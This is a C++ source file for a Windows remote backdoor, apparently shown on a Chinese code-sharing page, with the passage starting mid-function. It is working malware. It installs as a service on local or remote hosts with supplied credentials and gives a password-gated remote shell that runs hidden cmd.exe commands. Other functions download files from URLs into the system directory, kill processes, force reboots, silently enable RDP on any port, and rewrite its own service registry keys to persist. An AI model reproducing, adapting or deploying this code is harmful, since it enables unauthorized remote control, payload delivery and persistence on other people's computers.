📄 cmdbackdoor.cpp
字号:
printf("\n\n");
return ;
}
void Usage(char* cain)
{
printf("Attention:\n");
printf("\tBe careful with this software, Good luck !\n\n");
printf("Usage Show:\n");
printf("\tEXENAME -Install [RemoteHost] [Account] [Password]\n" );
printf("\tEXENAME -Remove [RemoteHost] [Account] [Password]\n\n");
printf("Example:\n");
printf("\tEXENAME -Install (Install in the localhost)\n");
printf("\tEXENAME -Remove (Remove in the localhost)\n");
printf("\tEXENAME -Install 192.168.0.1 qfsl 123456 (Install in 192.168.0.1)\n");
printf("\tEXENAME -Remove 192.168.0.1 qfsl 123456 (Remove in 192.168.0.1)\n");
return ;
}
DWORD WINAPI ThreadGetCmd( LPVOID lpParam )
{
__try
{
SOCKET ClientSocket=*(SOCKET *)lpParam;
char temp[3],recv_buff[1];temp[0]=8;temp[2]=8;
int cmdnum = 0 ,tempint=0;
send(ClientSocket,STARTINFO,strlen(STARTINFO),0);
send(ClientSocket,"\n\r密码: ",strlen("\n\r密码:"),0);
memset(cmd,0,1024);
while( recv(ClientSocket,recv_buff,1,0)!=0)
{
if (recv_buff[0]==8 )
{
temp[1]= strlen(cmd)?' ':'>';
if (strlen(cmd)) { send(ClientSocket,temp,3,0); cmd[strlen(cmd)-1] = 0;}
continue;
}
else if (recv_buff[0]=='\n')
{
if ((++cmdnum) ==1)
{
if(!memcmp(cmd,PASSWORD,strlen(PASSWORD)))
send(ClientSocket,"\n\r密码正确!祝你好运! --qfsl\n\rCMD>",strlen("\n\r密码正确!祝你好运! --qfsl\n\rCMD>"),0);
else {cmdnum = 0; send(ClientSocket,"\n\r错误!\n\r密码:",strlen("\n\r错误!\n\r密码:"),0);}
}
else
{
if(!stricmp(cmd,"remove /y")) RemoveCmdService(NULL);
else if(!stricmp(cmd,"help") || !stricmp(cmd,"/?") || !stricmp(cmd,"/h"))
{send(ClientSocket,HELPINFO,strlen(HELPINFO),0);send(ClientSocket,HELPINFO1,strlen(HELPINFO1),0);}
else if(!stricmp(cmd,"exit")) break;
else if(!stricmp(cmd,"plist")) pslist(ClientSocket);
else if(!stricmp(cmd,"ftp") || !memcmp(cmd,"ftp ",4) ) ;
else if(!stricmp(cmd,"sysinfo")) sysinfo(ClientSocket);
else if(!memcmp(cmd,"pkill",5) && strlen(cmd)>6) killps(atoi(strstr(cmd," ")),ClientSocket);
else if(!memcmp(cmd,"http://",7)) downfile(cmd,ClientSocket);
else if(!stricmp(cmd,"Reboot /y")) RebootComputer(EWX_REBOOT | EWX_FORCE);
else if(!stricmp(cmd,"shutdown /y")) RebootComputer(EWX_SHUTDOWN | EWX_FORCE);
else if(!memcmp(cmd,"open3389",8)) Open3389(cmd,ClientSocket);
else {if(strlen(cmd)) sendcmd(cmd,ClientSocket);}
send(ClientSocket,"\n\rCMD>",strlen("\n\rCMD>"),0);
}
memset(cmd,0,BUFFER_SIZE);
continue ;
}
else
{
if (recv_buff[0] ==27 || tempint ){ ++tempint; if (tempint>=3) tempint = 0;continue;}
if(! (recv_buff[0] ==10 || recv_buff[0] == 8 || recv_buff[0] == 13 || recv_buff[0] ==27 || tempint ) )
{
cmd[strlen(cmd)]=recv_buff[0];
if(send(ClientSocket,cmdnum>0 ? recv_buff :"*",1,0)==SOCKET_ERROR) break;
}
}
Sleep(10);
}
shutdown(ClientSocket,0x02);
closesocket(ClientSocket);
cmdnum=0;
}//end try
__finally {}
return 0;
}
void sysinfo(SOCKET ClientSocket)
{
__try{
unsigned __int64 m_start,m_overhead= 0;
MEMORYSTATUS m;
char temp[BUFFER_SIZE];
send(ClientSocket,"\n\r测试中...",strlen("\n\r测试中..."),0);
m_start = theCycleCount();
Sleep(1000);
unsigned cpuspeed100 = (unsigned)((theCycleCount()-m_start-m_overhead)/10000);
sprintf(temp,"\n\rCPU 速度:\t %d.%d\t MHz", cpuspeed100/100,cpuspeed100-((cpuspeed100/100)*100));
send(ClientSocket,temp,strlen(temp),0);
GlobalMemoryStatus( &m);
sprintf(temp,"\n\r物理内存:\t %3.4f\t M", m.dwTotalPhys/(float)1024000);
send(ClientSocket,temp,strlen(temp),0);
}//end try
__finally {}
}
void pslist(SOCKET ClientSocket)
{
char buffer[2048];
HANDLE hProcessSnap = NULL;
PROCESSENTRY32 pe32 = {0};
hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hProcessSnap == (HANDLE)-1) return ;
memset(buffer,0,2048);
strcat(buffer,"\r\n\t[EXE 文件名]\t\t\t\t\t\t[进程ID]\n\r\n\r");
pe32.dwSize = sizeof(PROCESSENTRY32);
if (Process32First(hProcessSnap, &pe32))
{
char a[5];
do
{
strcat(buffer,"\t");
strcat(buffer,pe32.szExeFile);
strcat(buffer,"\t\t");
if(strlen(pe32.szExeFile) / 8 ==0) strcat(buffer,"\t\t\t\t\t");
if(strlen(pe32.szExeFile) / 8 ==1) strcat(buffer,"\t\t\t\t");
if(strlen(pe32.szExeFile) / 8 ==2) strcat(buffer,"\t\t\t");
if(strlen(pe32.szExeFile) / 8 ==3) strcat(buffer,"\t\t");
if(strlen(pe32.szExeFile) / 8 ==4) strcat(buffer,"\t");
itoa(pe32.th32ProcessID,a,10);
strcat(buffer,a);
strcat(buffer,"\n\r");
}
while (Process32Next(hProcessSnap, &pe32));
}
CloseHandle (hProcessSnap);
send(ClientSocket,buffer,strlen(buffer),0);
return;
}
BOOL killps(DWORD id ,SOCKET ClientSocket)//杀进程函数
{
HANDLE hProcess=NULL,hProcessToken=NULL;
BOOL IsKilled=FALSE,bRet=FALSE;
__try
{
if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ALL_ACCESS,&hProcessToken))
{
send(ClientSocket,"\n\r操作指定进程失败!",strlen("\n\r操作指定进程失败"),0);
__leave;
}
if(!SetPrivilege(hProcessToken,SE_DEBUG_NAME,TRUE)) __leave;
send(ClientSocket,"\n\r设置权限...成功!",strlen("\n\r设置权限...成功!"),0);
if((hProcess=OpenProcess(PROCESS_ALL_ACCESS,FALSE,id))==NULL)
{
send(ClientSocket,"\n\r操作指定进程失败!",strlen("\n\r操作指定进程失败!"),0);
__leave;
}
if(!TerminateProcess(hProcess,1))
{
send(ClientSocket,"\n\r结束指定进程失败!",strlen("\n\r结束指定进程失败!"),0);
__leave;
}
IsKilled=TRUE;
send(ClientSocket,"\n\r指定进程已结束!",strlen("\n\t指定进程已结束!"),0);
}
__finally
{
if(hProcessToken!=NULL) CloseHandle(hProcessToken);
if(hProcess!=NULL) CloseHandle(hProcess);
}
return(IsKilled);
}
BOOL downfile(char* cmd,SOCKET ClientSocket)
{
if(char *FileName=strstr(cmd,"-"))
{
char url[200];//保存网址的数组
memset(url,0,200);
memcpy(url,cmd,int(FileName-cmd-1));
char fname[MAX_PATH];
GetSystemDirectory(fname,MAX_PATH);
FileName++;
strcat(fname,"\\");
strcat(fname,FileName);
HRESULT hRet=URLDownloadToFile(0,url,fname,0,0);
if(hRet==S_OK)
{
send(ClientSocket,"\n\r下载文件成功!路径:",strlen("\n\r下载文件成功!路径:"),0);
send(ClientSocket,fname,strlen(fname),0);
}
else
send(ClientSocket,"\n\r下载失败!",strlen("\n\r下载失败!"),0);
}
else send(ClientSocket,"\n\r输入格式错误!",strlen("\n\r输入格式错误!"),0);
return true;
}
BOOL sendcmd(char* cmd,SOCKET ClientSocket)
{
char PrevChar;
char cmdline[BUFFER_SIZE];
char szBuffer[BUFFER_SIZE];
char szBuffer2Send[BUFFER_SIZE+32];
DWORD dwBufferRead,dwBufferNow,dwBuffer2Send;
SECURITY_ATTRIBUTES sa;//创建匿名管道用于取得cmd的命令输出
HANDLE hRead,hWrite;
sa.nLength = sizeof(SECURITY_ATTRIBUTES);
sa.lpSecurityDescriptor = NULL;
sa.bInheritHandle = TRUE;
if (!CreatePipe(&hRead,&hWrite,&sa,0)) return false;
STARTUPINFO si;
PROCESS_INFORMATION pi;
si.cb = sizeof(STARTUPINFO);
GetStartupInfo(&si);
si.hStdError = hWrite;
si.hStdOutput = hWrite;
si.wShowWindow = SW_HIDE;
si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
memset(cmdline,0,BUFFER_SIZE);
GetSystemDirectory(cmdline,MAX_PATH+1);
strcat(cmdline,"\\cmd.exe /c ");
strcat(cmdline,cmd);
if (!CreateProcess(NULL,cmdline,NULL,NULL,TRUE,NULL,NULL,NULL,&si,&pi)) return false;
CloseHandle(hWrite);
send(ClientSocket,"\n\r",2,0);
while(PeekNamedPipe(hRead,szBuffer,BUFFER_SIZE,&dwBufferRead,NULL,NULL))
{//从管道中复制数据到缓冲区中,但不从管道中移出
if(dwBufferRead>0)
ReadFile(hRead,szBuffer,BUFFER_SIZE,&dwBufferRead,NULL);
//从管道中复制数据到缓冲区中;
else {Sleep(10); continue;}
for(dwBufferNow=0,dwBuffer2Send=0;dwBufferNow<dwBufferRead;dwBufferNow++,dwBuffer2Send++)
{
if((szBuffer[dwBufferNow]=='\n') && (PrevChar!='\r'))
szBuffer[dwBuffer2Send++]='\r';
PrevChar=szBuffer[dwBufferNow];
szBuffer2Send[dwBuffer2Send]=szBuffer[dwBufferNow];
}
if(send(ClientSocket,szBuffer2Send,dwBuffer2Send,0)==SOCKET_ERROR)
{
OutputDebugString("Send in ReadShell Error !\n");
break;
}
Sleep(5);
}//endwhile
memset(szBuffer2Send,0,dwBuffer2Send);
return true;
}
BOOL SetPrivilege(HANDLE hToken,LPCTSTR lpszPrivilege,BOOL bEnablePrivilege)//提示权限
{
TOKEN_PRIVILEGES tp;
LUID luid;
if(!LookupPrivilegeValue(NULL,lpszPrivilege,&luid)) return FALSE;
tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
if (bEnablePrivilege) tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
else
tp.Privileges[0].Attributes = 0;
AdjustTokenPrivileges(
hToken,
FALSE,
&tp,
sizeof(TOKEN_PRIVILEGES),
(PTOKEN_PRIVILEGES) NULL,
(PDWORD) NULL);
if (GetLastError() != ERROR_SUCCESS) return FALSE;
return TRUE;
}
inline unsigned __int64 theCycleCount(void)
{
_asm _emit 0x0F
_asm _emit 0x31
}
void Open3389(char* cmd ,SOCKET ClientSocket)
{
char *FileName=strstr(cmd," ");
unsigned long port =0;
if (FileName!=0) port = atoi(FileName);
if (port==0 ) port=3389;
int a=WriteReg(HKEY_LOCAL_MACHINE,
"SYSTEM\\CurrentControlSet\\Control\\Terminal Server",
"TSEnabled",
REG_DWORD,
NULL,
1,0);
int b=WriteReg(HKEY_LOCAL_MACHINE,
"SYSTEM\\CurrentControlSet\\Services\\TermService",
"Start",
REG_DWORD,
NULL,
2,0);
int c=WriteReg(HKEY_LOCAL_MACHINE,
"SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp",
"PortNumber",
REG_DWORD,
NULL,
port,0);
char temp[50];
sprintf(temp,"\n\r成功修改TermService的注册表!端口:%d", port);
if( a && b && c)
send(ClientSocket,temp,strlen(temp),0);
else
send(ClientSocket,"\n\r修改TermService的注册表失败!",strlen("\n\r修改TermService的注册表失败!"),0);
}
int WriteReg(HKEY MainKey,LPCTSTR Subkey,LPCTSTR Vname,DWORD type, LPCTSTR szBuf,DWORD dwData,int mode)
{
HKEY hk;
__try{
if(mode==0)
if ( RegCreateKey(MainKey,Subkey, &hk) ) {if (RegOpenKey(MainKey,Subkey, &hk)) return 0;}
if(type==REG_SZ)
if (RegSetValueEx(hk,
Vname,
0,
type,
(LPBYTE) szBuf,
strlen(szBuf) + 1)) return 0;
if(type==REG_DWORD)
if (RegSetValueEx(hk,
Vname,
0,
type,
(LPBYTE) &dwData,
sizeof(DWORD))) return 0;
RegCloseKey(hk);
}//end try
__finally {}
return 1;
}
void RebootComputer(int type)
{
HANDLE hToken;
TOKEN_PRIVILEGES tkp;
OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken);
LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME, &tkp.Privileges[0].Luid);
tkp.PrivilegeCount = 1;
tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken, FALSE, &tkp, 0, (PTOKEN_PRIVILEGES)NULL, 0);
ExitWindowsEx(type, 0);
return;
}
DWORD WINAPI ProtectSelf( LPVOID lpParam )
{
char* temp="SYSTEM\\CurrentControlSet\\Services\\";
strcat(temp,szServiceName);
__try
{
while(1)
{
WriteReg(HKEY_LOCAL_MACHINE,temp,"Start",REG_DWORD,NULL,2,0);
WriteReg(HKEY_LOCAL_MACHINE,temp,"Description",REG_SZ,szDisplayName,NULL,0);
Sleep(2000);
}
}
__finally {}
return 0;
}⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -